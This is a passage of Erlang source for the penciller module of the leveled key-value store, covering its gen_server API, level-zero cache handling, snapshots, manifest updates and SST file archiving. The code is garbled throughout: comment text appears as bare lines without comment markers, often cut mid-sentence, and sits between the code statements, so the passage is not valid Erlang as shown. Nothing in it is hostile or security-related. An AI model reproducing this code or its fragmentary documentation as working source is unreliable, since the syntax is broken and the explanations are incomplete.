levelzero_astree :: list() | undefined | redacted,
root_path = "test" :: string(),
clerk :: pid() | undefined,
is_snapshot = false :: boolean(),
snapshot_fully_loaded = false :: boolean(),
snapshot_time :: pos_integer() | undefined,
source_penciller :: pid() | undefined,
bookie_monref :: reference() | undefined,
pending_removals = [] :: list(string()),
maybe_release = false :: boolean(),
snaptimeout_short :: pos_integer()|undefined,
snaptimeout_long :: pos_integer()|undefined,
monitor = {no_monitor, 0} :: leveled_monitor:monitor(),
sst_options = #sst_options{} :: sst_options()}).
-type penciller_options() :: #penciller_options{}.
-type bookies_memory() :: {tuple()|empty_cache,
array:array()|empty_array,
integer()|infinity,
integer()}.
-type pcl_state() :: #state{}.
-type levelzero_cacheentry() :: {pos_integer(), leveled_tree:leveled_tree()}.
-type levelzero_cache() :: list(levelzero_cacheentry()).
-type iterator_entry()
:: {pos_integer(),
list(leveled_codec:ledger_kv()|leveled_sst:expandable_pointer())}.
-type iterator() :: list(iterator_entry()).
-type bad_ledgerkey() :: list().
-type sqn_check() :: current|replaced|missing.
-type sst_fetchfun() ::
fun((pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
non_neg_integer()) ->
leveled_codec:ledger_kv()|not_present).
-type levelzero_returnfun() :: fun((levelzero_cacheentry()) -> ok).
-type pclacc_fun() ::
fun((leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
any()) -> any()).
-type sst_options() :: #sst_options{}.
-export_type([levelzero_cacheentry/0, levelzero_returnfun/0, sqn_check/0]).
-spec pcl_start(penciller_options()) -> {ok, pid()}.
associated sst files to start - up from a previous persisted state .
query is run against the level zero space and just the query results are
pcl_start(PCLopts) ->
gen_server:start_link(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_snapstart(penciller_options()) -> {ok, pid()}.
pcl_snapstart(PCLopts) ->
gen_server:start(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_pushmem(pid(), bookies_memory()) -> ok|returned.
Load the contents of the Bookie 's memory of recent additions to the Ledger
to the Ledger proper .
at the Bookie , and try again soon . This normally only occurs when there
pcl_pushmem(Pid, LedgerCache) ->
Bookie to dump memory onto penciller
gen_server:call(Pid, {push_mem, LedgerCache}, infinity).
-spec pcl_fetchlevelzero(pid(),
non_neg_integer(),
fun((levelzero_cacheentry()) -> ok))
-> ok.
Allows a single slot of the penciller 's levelzero cache to be fetched . The
levelzero cache can be up to 40 K keys - sending this to the process that is
persisting this in a SST file in a single cast will lock the process for
pcl_fetchlevelzero(Pid, Slot, ReturnFun) ->
Timeout to cause crash of L0 file when it ca n't get the close signal
If the timeout gets hit outside of close scenario the Penciller will
be stuck in L0 pending
gen_server:cast(Pid, {fetch_levelzero, Slot, ReturnFun}).
-spec pcl_fetch(pid(), leveled_codec:ledger_key())
-> leveled_codec:ledger_kv()|not_present.
Fetch a key , return the first ( highest SQN ) occurrence of that Key along
pcl_fetch(Pid, Key) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {fetch, Key, Hash, true}, infinity)
end.
-spec pcl_fetch(pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
boolean()) -> leveled_codec:ledger_kv()|not_present.
Fetch a key , return the first ( highest SQN ) occurrence of that Key along
pcl_fetch(Pid, Key, Hash, UseL0Index) ->
gen_server:call(Pid, {fetch, Key, Hash, UseL0Index}, infinity).
-spec pcl_fetchkeys(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(), as_pcl|by_runner) -> any().
Run a range query between StartKey and ( inclusive ) . This will cover
Comparison with the upper - end of the range ( EndKey ) is done using
the top of the range . Comparison with the start of the range is based on
Erlang term order .
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc) ->
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, as_pcl).
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, By) ->
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
false, false, -1,
By},
infinity).
-spec pcl_fetchkeysbysegment(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(),
leveled_codec:segment_list(),
false | leveled_codec:lastmod_range(),
boolean()) -> any().
Run a range query between StartKey and ( inclusive ) . This will cover
This version allows an additional input of a SegmentList . This is a list
of 16 - bit integers representing the segment IDs band ( ( 2 ^ 16 ) -1 ) that
use the no_lookup hash
pcl_fetchkeysbysegment(Pid, StartKey, EndKey, AccFun, InitAcc,
SegmentList, LastModRange, LimitByCount) ->
{MaxKeys, InitAcc0} =
case LimitByCount of
true ->
as the first element of a tuple with the actual accumulator
InitAcc;
false ->
{-1, InitAcc}
end,
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey, AccFun, InitAcc0,
SegmentList, LastModRange, MaxKeys,
by_runner},
infinity).
-spec pcl_fetchnextkey(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any()) -> any().
Run a range query between StartKey and ( inclusive ) . This has the
same constraints as pcl_fetchkeys/5 , but will only return the first key
found in erlang term order .
pcl_fetchnextkey(Pid, StartKey, EndKey, AccFun, InitAcc) ->
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
false, false, 1,
as_pcl},
infinity).
-spec pcl_checksequencenumber(pid(),
leveled_codec:ledger_key()|bad_ledgerkey(),
integer()) -> sqn_check().
pcl_checksequencenumber(Pid, Key, SQN) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {check_sqn, Key, Hash, SQN}, infinity)
end.
-spec pcl_workforclerk(pid()) -> ok.
Penciller will cast back to the clerk , no response is sent to this
pcl_workforclerk(Pid) ->
gen_server:cast(Pid, work_for_clerk).
-spec pcl_manifestchange(pid(), leveled_pmanifest:manifest()) -> ok.
pcl_manifestchange(Pid, Manifest) ->
gen_server:cast(Pid, {manifest_change, Manifest}).
-spec pcl_confirml0complete(pid(),
string(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
binary()) -> ok.
Allows a SST writer that has written a L0 file to confirm that the file
manifest and the file can be used in place of the in - memory levelzero
pcl_confirml0complete(Pid, FN, StartKey, EndKey, Bloom) ->
gen_server:cast(Pid, {levelzero_complete, FN, StartKey, EndKey, Bloom}).
-spec pcl_confirmdelete(pid(), string(), pid()) -> ok.
pcl_confirmdelete(Pid, FileName, FilePid) ->
gen_server:cast(Pid, {confirm_delete, FileName, FilePid}).
-spec pcl_getstartupsequencenumber(pid()) -> integer().
be reloaded from that point in the Journal )
pcl_getstartupsequencenumber(Pid) ->
gen_server:call(Pid, get_startup_sqn, infinity).
-spec pcl_registersnapshot(pid(),
pid(),
no_lookup|{tuple(), tuple()}|undefined,
bookies_memory(),
boolean())
-> {ok, pcl_state()}.
penciller for the snapshot to use as its LoopData
pcl_registersnapshot(Pid, Snapshot, Query, BookiesMem, LR) ->
gen_server:call(Pid,
{register_snapshot, Snapshot, Query, BookiesMem, LR},
infinity).
-spec pcl_releasesnapshot(pid(), pid()) -> ok.
pcl_releasesnapshot(Pid, Snapshot) ->
gen_server:cast(Pid, {release_snapshot, Snapshot}).
-spec pcl_persistedsqn(pid()) -> integer().
Return the persisted SQN , the highest SQN which has been persisted into the
pcl_persistedsqn(Pid) ->
gen_server:call(Pid, persisted_sqn, infinity).
-spec pcl_close(pid()) -> ok.
pcl_close(Pid) ->
gen_server:call(Pid, close, 60000).
-spec pcl_doom(pid()) -> {ok, list()}.
Return a list of from where files exist for this penciller ( should
pcl_doom(Pid) ->
gen_server:call(Pid, doom, 60000).
-spec pcl_checkbloomtest(pid(), tuple()) -> boolean().
pcl_checkbloomtest(Pid, Key) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {checkbloom_fortest, Key, Hash}, 2000)
end.
-spec pcl_checkforwork(pid()) -> boolean().
pcl_checkforwork(Pid) ->
gen_server:call(Pid, check_for_work, 2000).
-spec pcl_loglevel(pid(), leveled_log:log_level()) -> ok.
Change the log level of the Journal
pcl_loglevel(Pid, LogLevel) ->
gen_server:cast(Pid, {log_level, LogLevel}).
-spec pcl_addlogs(pid(), list(string())) -> ok.
pcl_addlogs(Pid, ForcedLogs) ->
gen_server:cast(Pid, {add_logs, ForcedLogs}).
-spec pcl_removelogs(pid(), list(string())) -> ok.
pcl_removelogs(Pid, ForcedLogs) ->
gen_server:cast(Pid, {remove_logs, ForcedLogs}).
init([LogOpts, PCLopts]) ->
leveled_log:save(LogOpts),
leveled_rand:seed(),
case {PCLopts#penciller_options.root_path,
PCLopts#penciller_options.start_snapshot,
PCLopts#penciller_options.snapshot_query,
PCLopts#penciller_options.bookies_mem} of
{undefined, _Snapshot=true, Query, BookiesMem} ->
SrcPenciller = PCLopts#penciller_options.source_penciller,
LongRunning = PCLopts#penciller_options.snapshot_longrunning,
BookieMonitor =
erlang:monitor(process, PCLopts#penciller_options.bookies_pid),
{ok, State} = pcl_registersnapshot(SrcPenciller,
self(),
Query,
BookiesMem,
LongRunning),
leveled_log:log(p0001, [self()]),
{ok, State#state{is_snapshot = true,
bookie_monref = BookieMonitor,
source_penciller = SrcPenciller}};
{_RootPath, _Snapshot=false, _Q, _BM} ->
start_from_file(PCLopts)
end.
handle_call({push_mem, {LedgerTable, PushedIdx, MinSQN, MaxSQN}},
_From,
State=#state{is_snapshot=Snap}) when Snap == false ->
1 . If either the penciller is still waiting on the last L0 file to be
the maximum number of lines ( by default after 31 pushes from the bookie )
2 . If ( 1 ) does not apply , the bookie 's cache will be added to the
SW = os:timestamp(),
L0Pending = State#state.levelzero_pending,
WorkBacklog = State#state.work_backlog,
CacheAlreadyFull = leveled_pmem:cache_full(State#state.levelzero_cache),
L0Size = State#state.levelzero_size,
The clerk is prompted into action as there may be a L0 write required
ok = leveled_pclerk:clerk_prompt(State#state.clerk),
case L0Pending or WorkBacklog or CacheAlreadyFull of
true ->
The Bookie must now retain the lesger cache and try to push the
leveled_log:log(
p0018,
[L0Size, L0Pending, WorkBacklog, CacheAlreadyFull]),
{reply, returned, State};
false ->
Return ok as cache has been updated on State and the Bookie
should clear its ledger cache which is now with the Penciller
PushedTree =
case is_tuple(LedgerTable) of
true ->
LedgerTable;
false ->
leveled_tree:from_orderedset(LedgerTable, ?CACHE_TYPE)
end,
case leveled_pmem:add_to_cache(
L0Size,
{PushedTree, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
true) of
empty_push ->
{reply, ok, State};
{UpdMaxSQN, NewL0Size, UpdL0Cache} ->
UpdL0Index =
leveled_pmem:add_to_index(
PushedIdx,
State#state.levelzero_index,
length(State#state.levelzero_cache) + 1),
leveled_log:log_randomtimer(
p0031,
[NewL0Size, true, true, MinSQN, MaxSQN], SW, 0.1),
{reply,
ok,
State#state{
levelzero_cache = UpdL0Cache,
levelzero_size = NewL0Size,
levelzero_index = UpdL0Index,
ledger_sqn = UpdMaxSQN}}
end
end;
handle_call({fetch, Key, Hash, UseL0Index}, _From, State) ->
L0Idx =
case UseL0Index of
true ->
State#state.levelzero_index;
false ->
none
end,
R =
timed_fetch_mem(
Key, Hash, State#state.manifest,
State#state.levelzero_cache, L0Idx,
State#state.monitor),
{reply, R, State};
handle_call({check_sqn, Key, Hash, SQN}, _From, State) ->
{reply,
compare_to_sqn(
fetch_sqn(
Key,
Hash,
State#state.manifest,
State#state.levelzero_cache,
State#state.levelzero_index),
SQN),
State};
handle_call({fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
SegmentList, LastModRange, MaxKeys, By},
_From,
State=#state{snapshot_fully_loaded=Ready})
when Ready == true ->
LastModRange0 =
case LastModRange of
false ->
?OPEN_LASTMOD_RANGE;
R ->
R
end,
SW = os:timestamp(),
L0AsList =
case State#state.levelzero_astree of
undefined ->
leveled_pmem:merge_trees(StartKey,
EndKey,
State#state.levelzero_cache,
leveled_tree:empty(?CACHE_TYPE));
List ->
List
end,
FilteredL0 =
case SegmentList of
false ->
L0AsList;
_ ->
TunedList = leveled_sst:tune_seglist(SegmentList),
FilterFun =
fun(LKV) ->
CheckSeg =
leveled_sst:extract_hash(
leveled_codec:strip_to_segmentonly(LKV)),
leveled_sst:member_check(CheckSeg, TunedList)
end,
lists:filter(FilterFun, L0AsList)
end,
leveled_log:log_randomtimer(
p0037, [State#state.levelzero_size], SW, 0.01),
SSTiter =
case State#state.query_manifest of
undefined ->
leveled_pmanifest:query_manifest(
State#state.manifest, StartKey, EndKey);
{QueryManifest, StartKeyQM, EndKeyQM}
when StartKey >= StartKeyQM, EndKey =< EndKeyQM ->
QueryManifest
end,
SnapshotTime = State#state.snapshot_time,
Folder =
fun() ->
keyfolder({FilteredL0, SSTiter},
{StartKey, EndKey},
{AccFun, InitAcc, SnapshotTime},
{SegmentList, LastModRange0, MaxKeys})
end,
case By of
as_pcl ->
{reply, Folder(), State};
by_runner ->
{reply, Folder, State}
end;
handle_call(get_startup_sqn, _From, State) ->
{reply, State#state.persisted_sqn, State};
handle_call({register_snapshot, Snapshot, Query, BookiesMem, LongRunning},
_From, State) ->
of ( StartKey , ) - this will avoid a fully copy of the penciller 's
TimeO =
case LongRunning of
true ->
State#state.snaptimeout_long;
false ->
State#state.snaptimeout_short
end,
Manifest0 =
leveled_pmanifest:add_snapshot(State#state.manifest, Snapshot, TimeO),
{BookieIncrTree, BookieIdx, MinSQN, MaxSQN} = BookiesMem,
LM1Cache =
case BookieIncrTree of
empty_cache ->
leveled_tree:empty(?CACHE_TYPE);
_ ->
BookieIncrTree
end,
{CloneState, ManifestClone, QueryManifest} =
case Query of
no_lookup ->
{UpdMaxSQN, UpdSize, L0Cache} =
leveled_pmem:add_to_cache(
State#state.levelzero_size,
{LM1Cache, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
false),
{#state{levelzero_cache = L0Cache,
ledger_sqn = UpdMaxSQN,
levelzero_size = UpdSize,
persisted_sqn = State#state.persisted_sqn},
leveled_pmanifest:copy_manifest(State#state.manifest),
undefined};
{StartKey, EndKey} ->
SW = os:timestamp(),
L0AsTree =
leveled_pmem:merge_trees(StartKey,
EndKey,
State#state.levelzero_cache,
LM1Cache),
leveled_log:log_randomtimer(
p0037, [State#state.levelzero_size], SW, 0.01),
{#state{levelzero_astree = L0AsTree,
ledger_sqn = MaxSQN,
persisted_sqn = State#state.persisted_sqn},
undefined,
{leveled_pmanifest:query_manifest(
State#state.manifest, StartKey, EndKey),
StartKey,
EndKey}};
undefined ->
{UpdMaxSQN, UpdSize, L0Cache} =
leveled_pmem:add_to_cache(
State#state.levelzero_size,
{LM1Cache, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
false),
LM1Idx =
case BookieIdx of
empty_index ->
leveled_pmem:new_index();
_ ->
BookieIdx
end,
L0Index =
leveled_pmem:add_to_index(
LM1Idx, State#state.levelzero_index, length(L0Cache)),
{#state{levelzero_cache = L0Cache,
levelzero_index = L0Index,
levelzero_size = UpdSize,
ledger_sqn = UpdMaxSQN,
persisted_sqn = State#state.persisted_sqn},
leveled_pmanifest:copy_manifest(State#state.manifest),
undefined}
end,
{reply,
{ok,
CloneState#state{snapshot_fully_loaded = true,
snapshot_time = leveled_util:integer_now(),
manifest = ManifestClone,
query_manifest = QueryManifest}},
State#state{manifest = Manifest0}};
handle_call(close, _From, State=#state{is_snapshot=Snap}) when Snap == true ->
ok = pcl_releasesnapshot(State#state.source_penciller, self()),
{stop, normal, ok, State};
handle_call(close, _From, State) ->
Level 0 files lie outside of the manifest , and so if there is no L0
there is a L0 file present - then the memory can be dropped ( it is
of a L0 file ) .
ok = leveled_pclerk:clerk_close(State#state.clerk),
leveled_log:log(p0008, [close]),
L0Left = State#state.levelzero_size > 0,
case (not State#state.levelzero_pending and L0Left) of
true ->
Man0 = State#state.manifest,
{Constructor, _} =
roll_memory(
leveled_pmanifest:get_manifest_sqn(Man0) + 1,
State#state.ledger_sqn,
State#state.root_path,
State#state.levelzero_cache,
length(State#state.levelzero_cache),
State#state.sst_options,
true),
ok = leveled_sst:sst_close(Constructor);
false ->
leveled_log:log(p0010, [State#state.levelzero_size])
end,
shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
{stop, normal, ok, State};
handle_call(doom, _From, State) ->
leveled_log:log(p0030, []),
ok = leveled_pclerk:clerk_close(State#state.clerk),
shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
ManifestFP = State#state.root_path ++ "/" ++ ?MANIFEST_FP ++ "/",
FilesFP = State#state.root_path ++ "/" ++ ?FILES_FP ++ "/",
{stop, normal, {ok, [ManifestFP, FilesFP]}, State};
handle_call({checkbloom_fortest, Key, Hash}, _From, State) ->
Manifest = State#state.manifest,
FoldFun =
fun(Level, Acc) ->
case Acc of
true ->
true;
false ->
case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
false ->
false;
FP ->
leveled_pmanifest:check_bloom(Manifest, FP, Hash)
end
end
end,
{reply, lists:foldl(FoldFun, false, lists:seq(0, ?MAX_LEVELS)), State};
handle_call(check_for_work, _From, State) ->
{_WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
{reply, WC > 0, State};
handle_call(persisted_sqn, _From, State) ->
{reply, State#state.persisted_sqn, State}.
handle_cast({manifest_change, Manifest}, State) ->
NewManSQN = leveled_pmanifest:get_manifest_sqn(Manifest),
OldManSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest),
leveled_log:log(p0041, [OldManSQN, NewManSQN]),
Only safe to update the manifest if the SQN increments
if NewManSQN > OldManSQN ->
ok =
leveled_pclerk:clerk_promptdeletions(State#state.clerk, NewManSQN),
UpdManifest0 =
leveled_pmanifest:merge_snapshot(State#state.manifest, Manifest),
UpdManifest1 =
leveled_pmanifest:clear_pending(
UpdManifest0,
lists:usort(State#state.pending_removals),
State#state.maybe_release),
{noreply,
State#state{
manifest=UpdManifest1,
pending_removals = [],
maybe_release = false,
work_ongoing=false}}
end;
handle_cast({release_snapshot, Snapshot}, State) ->
Manifest0 = leveled_pmanifest:release_snapshot(State#state.manifest,
Snapshot),
leveled_log:log(p0003, [Snapshot]),
{noreply, State#state{manifest=Manifest0}};
handle_cast({confirm_delete, PDFN, FilePid}, State=#state{is_snapshot=Snap})
when Snap == false ->
This is a two stage process . A file that is ready for deletion can be
case leveled_pmanifest:ready_to_delete(State#state.manifest, PDFN) of
true ->
leveled_log:log(p0005, [PDFN]),
ok = leveled_sst:sst_deleteconfirmed(FilePid),
case State#state.work_ongoing of
true ->
{noreply,
State#state{
pending_removals =
[PDFN|State#state.pending_removals]}};
false ->
UpdManifest =
leveled_pmanifest:clear_pending(
State#state.manifest,
[PDFN],
false),
{noreply,
State#state{manifest = UpdManifest}}
end;
false ->
case State#state.work_ongoing of
true ->
{noreply, State#state{maybe_release = true}};
false ->
UpdManifest =
leveled_pmanifest:clear_pending(
State#state.manifest,
[],
true),
{noreply,
State#state{manifest = UpdManifest}}
end
end;
handle_cast({levelzero_complete, FN, StartKey, EndKey, Bloom}, State) ->
leveled_log:log(p0029, []),
ManEntry = #manifest_entry{start_key=StartKey,
end_key=EndKey,
owner=State#state.levelzero_constructor,
filename=FN,
bloom=Bloom},
ManifestSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest) + 1,
UpdMan = leveled_pmanifest:insert_manifest_entry(State#state.manifest,
ManifestSQN,
0,
ManEntry),
Prompt clerk to ask about work - do this for every L0 roll
ok = leveled_pclerk:clerk_prompt(State#state.clerk),
{noreply, State#state{levelzero_cache=[],
levelzero_index=[],
levelzero_pending=false,
levelzero_constructor=undefined,
levelzero_size=0,
manifest=UpdMan,
persisted_sqn=State#state.ledger_sqn}};
handle_cast(work_for_clerk, State) ->
case {(State#state.levelzero_pending or State#state.work_ongoing),
leveled_pmanifest:levelzero_present(State#state.manifest)} of
{true, _L0Present} ->
{noreply, State};
{false, true} ->
If L0 present , and no work ongoing - dropping L0 to L1 is the
ok = leveled_pclerk:clerk_push(
State#state.clerk, {0, State#state.manifest}),
{noreply, State#state{work_ongoing=true}};
{false, false} ->
CacheOverSize =
maybe_cache_too_big(
State#state.levelzero_size,
State#state.levelzero_maxcachesize,
State#state.levelzero_cointoss),
CacheAlreadyFull =
leveled_pmem:cache_full(State#state.levelzero_cache),
{WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
case {WC, (CacheAlreadyFull or CacheOverSize)} of
{0, false} ->
{noreply, State#state{work_backlog = false}};
{WC, true} when WC < ?WORKQUEUE_BACKLOG_TOLERANCE ->
Rolling the memory to create a new Level Zero file
NextSQN =
leveled_pmanifest:get_manifest_sqn(
State#state.manifest) + 1,
{Constructor, none} =
roll_memory(
NextSQN,
State#state.ledger_sqn,
State#state.root_path,
none,
length(State#state.levelzero_cache),
State#state.sst_options,
false),
{noreply,
State#state{
levelzero_pending = true,
levelzero_constructor = Constructor,
work_backlog = false}};
{WC, L0Full} ->
Backlog = WC >= ?WORKQUEUE_BACKLOG_TOLERANCE,
leveled_log:log(p0024, [WC, Backlog, L0Full]),
[TL|_Tail] = WL,
ok =
leveled_pclerk:clerk_push(
State#state.clerk, {TL, State#state.manifest}),
{noreply,
State#state{
work_backlog = Backlog, work_ongoing = true}}
end
end;
handle_cast({fetch_levelzero, Slot, ReturnFun}, State) ->
ReturnFun(lists:nth(Slot, State#state.levelzero_cache)),
{noreply, State};
handle_cast({log_level, LogLevel}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_loglevel(PC, LogLevel),
ok = leveled_log:set_loglevel(LogLevel),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}};
handle_cast({add_logs, ForcedLogs}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_addlogs(PC, ForcedLogs),
ok = leveled_log:add_forcedlogs(ForcedLogs),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}};
handle_cast({remove_logs, ForcedLogs}, State) ->
PC = State#state.clerk,
ok = leveled_pclerk:clerk_removelogs(PC, ForcedLogs),
ok = leveled_log:remove_forcedlogs(ForcedLogs),
SSTopts = State#state.sst_options,
SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
{noreply, State#state{sst_options = SSTopts0}}.
handle_info({'DOWN', BookieMonRef, process, _BookiePid, _Info},
State=#state{bookie_monref = BookieMonRef}) ->
ok = pcl_releasesnapshot(State#state.source_penciller, self()),
{stop, normal, State};
handle_info(_Info, State) ->
{noreply, State}.
terminate(Reason, _State=#state{is_snapshot=Snap}) when Snap == true ->
leveled_log:log(p0007, [Reason]);
terminate(Reason, _State) ->
leveled_log:log(p0011, [Reason]).
format_status(normal, [_PDict, State]) ->
State;
format_status(terminate, [_PDict, State]) ->
State#state{manifest = redacted,
levelzero_cache = redacted,
levelzero_index = redacted,
levelzero_astree = redacted}.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
sst_rootpath(RootPath) ->
FP = RootPath ++ "/" ++ ?FILES_FP,
filelib:ensure_dir(FP ++ "/"),
FP.
sst_filename(ManSQN, Level, Count) ->
lists:flatten(io_lib:format("./~w_~w_~w" ++ ?SST_FILEX,
[ManSQN, Level, Count])).
Internal functions
-spec start_from_file(penciller_options()) -> {ok, pcl_state()}.
start_from_file(PCLopts) ->
RootPath = PCLopts#penciller_options.root_path,
MaxTableSize = PCLopts#penciller_options.max_inmemory_tablesize,
OptsSST = PCLopts#penciller_options.sst_options,
Monitor = PCLopts#penciller_options.monitor,
SnapTimeoutShort = PCLopts#penciller_options.snaptimeout_short,
SnapTimeoutLong = PCLopts#penciller_options.snaptimeout_long,
{ok, MergeClerk} = leveled_pclerk:clerk_new(self(), RootPath, OptsSST),
CoinToss = PCLopts#penciller_options.levelzero_cointoss,
Used to randomly defer the writing of L0 file . Intended to help with
level zero concurrently )
InitState = #state{clerk = MergeClerk,
root_path = RootPath,
levelzero_maxcachesize = MaxTableSize,
levelzero_cointoss = CoinToss,
levelzero_index = [],
snaptimeout_short = SnapTimeoutShort,
snaptimeout_long = SnapTimeoutLong,
sst_options = OptsSST,
monitor = Monitor},
Manifest0 = leveled_pmanifest:open_manifest(RootPath),
OpenFun =
fun(FN, Level) ->
{ok, Pid, {_FK, _LK}, Bloom} =
leveled_sst:sst_open(sst_rootpath(RootPath),
FN, OptsSST, Level),
{Pid, Bloom}
end,
SQNFun = fun leveled_sst:sst_getmaxsequencenumber/1,
{MaxSQN, Manifest1, FileList} =
leveled_pmanifest:load_manifest(Manifest0, OpenFun, SQNFun),
leveled_log:log(p0014, [MaxSQN]),
ManSQN = leveled_pmanifest:get_manifest_sqn(Manifest1),
leveled_log:log(p0035, [ManSQN]),
Find any L0 files
L0FN = sst_filename(ManSQN + 1, 0, 0),
{State0, FileList0} =
case filelib:is_file(filename:join(sst_rootpath(RootPath), L0FN)) of
true ->
leveled_log:log(p0015, [L0FN]),
L0Open = leveled_sst:sst_open(sst_rootpath(RootPath),
L0FN,
OptsSST,
0),
{ok, L0Pid, {L0StartKey, L0EndKey}, Bloom} = L0Open,
L0SQN = leveled_sst:sst_getmaxsequencenumber(L0Pid),
L0Entry = #manifest_entry{start_key = L0StartKey,
end_key = L0EndKey,
filename = L0FN,
owner = L0Pid,
bloom = Bloom},
Manifest2 =
leveled_pmanifest:insert_manifest_entry(Manifest1,
ManSQN + 1,
0,
L0Entry),
leveled_log:log(p0016, [L0SQN]),
LedgerSQN = max(MaxSQN, L0SQN),
{InitState#state{manifest = Manifest2,
ledger_sqn = LedgerSQN,
persisted_sqn = LedgerSQN},
[L0FN|FileList]};
false ->
leveled_log:log(p0017, []),
{InitState#state{manifest = Manifest1,
ledger_sqn = MaxSQN,
persisted_sqn = MaxSQN},
FileList}
end,
ok = archive_files(RootPath, FileList0),
{ok, State0}.
-spec shutdown_manifest(leveled_pmanifest:manifest(), pid()|undefined) -> ok.
Shutdown all the SST files within the manifest
shutdown_manifest(Manifest, L0Constructor) ->
EntryCloseFun =
fun(ME) ->
Owner =
case is_record(ME, manifest_entry) of
true ->
ME#manifest_entry.owner;
false ->
case ME of
{_SK, ME0} ->
ME0#manifest_entry.owner;
ME ->
ME
end
end,
ok =
case check_alive(Owner) of
true ->
leveled_sst:sst_close(Owner);
false ->
ok
end
end,
leveled_pmanifest:close_manifest(Manifest, EntryCloseFun),
EntryCloseFun(L0Constructor).
-spec check_alive(pid()|undefined) -> boolean().
check_alive(Owner) when is_pid(Owner) ->
is_process_alive(Owner);
check_alive(_Owner) ->
false.
-spec archive_files(list(), list()) -> ok.
Archive any sst files in the folder that have not been used to build the
archive_files(RootPath, UsedFileList) ->
{ok, AllFiles} = file:list_dir(sst_rootpath(RootPath)),
FileCheckFun =
fun(FN, UnusedFiles) ->
FN0 = "./" ++ FN,
case filename:extension(FN0) of
?SST_FILEX ->
case lists:member(FN0, UsedFileList) of
true ->
UnusedFiles;
false ->
leveled_log:log(p0040, [FN0]),
[FN0|UnusedFiles]
end;
_ ->
UnusedFiles
end
end,
RenameFun =
fun(FN) ->
AltName = filename:join(sst_rootpath(RootPath),
filename:basename(FN, ?SST_FILEX))
++ ?ARCHIVE_FILEX,
file:rename(filename:join(sst_rootpath(RootPath), FN),
AltName)
end,
FilesToArchive = lists:foldl(FileCheckFun, [], AllFiles),
lists:foreach(RenameFun, FilesToArchive),
ok.
-spec maybe_cache_too_big(
pos_integer(), pos_integer(), boolean()) -> boolean().
where there are multiple leveled instances on one machine .
maybe_cache_too_big(NewL0Size, L0MaxSize, CoinToss) ->
CacheTooBig = NewL0Size > L0MaxSize,
CacheMuchTooBig =
NewL0Size > min(?SUPER_MAX_TABLE_SIZE, 2 * L0MaxSize),
RandomFactor =
case CoinToss of
true ->
case leveled_rand:uniform(?COIN_SIDECOUNT) of
1 ->
true;
_ ->
false
end;
false ->
true
end,
CacheTooBig and (RandomFactor or CacheMuchTooBig).
-spec roll_memory(
pos_integer(), non_neg_integer(), string(),
levelzero_cache()|none, pos_integer(),
sst_options(), boolean())
-> {pid(), leveled_ebloom:bloom()|none}.
Roll the in - memory cache into a L0 file . If this is done synchronously ,
Casting a large object ( the levelzero cache ) to the SST file does not lead
to an immediate return . With 32 K keys in the TreeList it could take around
35 - 40ms due to the overheads of copying .
To avoid blocking the penciller , the SST file can request each item of the
roll_memory(NextManSQN, LedgerSQN, RootPath, none, CL, SSTOpts, false) ->
L0Path = sst_rootpath(RootPath),
L0FN = sst_filename(NextManSQN, 0, 0),
leveled_log:log(p0019, [L0FN, LedgerSQN]),
PCL = self(),
FetchFun =
fun(Slot, ReturnFun) -> pcl_fetchlevelzero(PCL, Slot, ReturnFun) end,
{ok, Constructor, _} =
leveled_sst:sst_newlevelzero(
L0Path, L0FN, CL, FetchFun, PCL, LedgerSQN, SSTOpts),
{Constructor, none};
roll_memory(NextManSQN, LedgerSQN, RootPath, L0Cache, CL, SSTOpts, true) ->
L0Path = sst_rootpath(RootPath),
L0FN = sst_filename(NextManSQN, 0, 0),
FetchFun = fun(Slot) -> lists:nth(Slot, L0Cache) end,
KVList = leveled_pmem:to_list(CL, FetchFun),
{ok, Constructor, _, Bloom} =
leveled_sst:sst_new(
L0Path, L0FN, 0, KVList, LedgerSQN, SSTOpts),
{Constructor, Bloom}.
-spec timed_fetch_mem(
tuple(),
{integer(), integer()},
leveled_pmanifest:manifest(), list(),
leveled_pmem:index_array(),
leveled_monitor:monitor()) -> leveled_codec:ledger_kv()|not_found.
and if it is not found looking down level by level through the LSM tree .
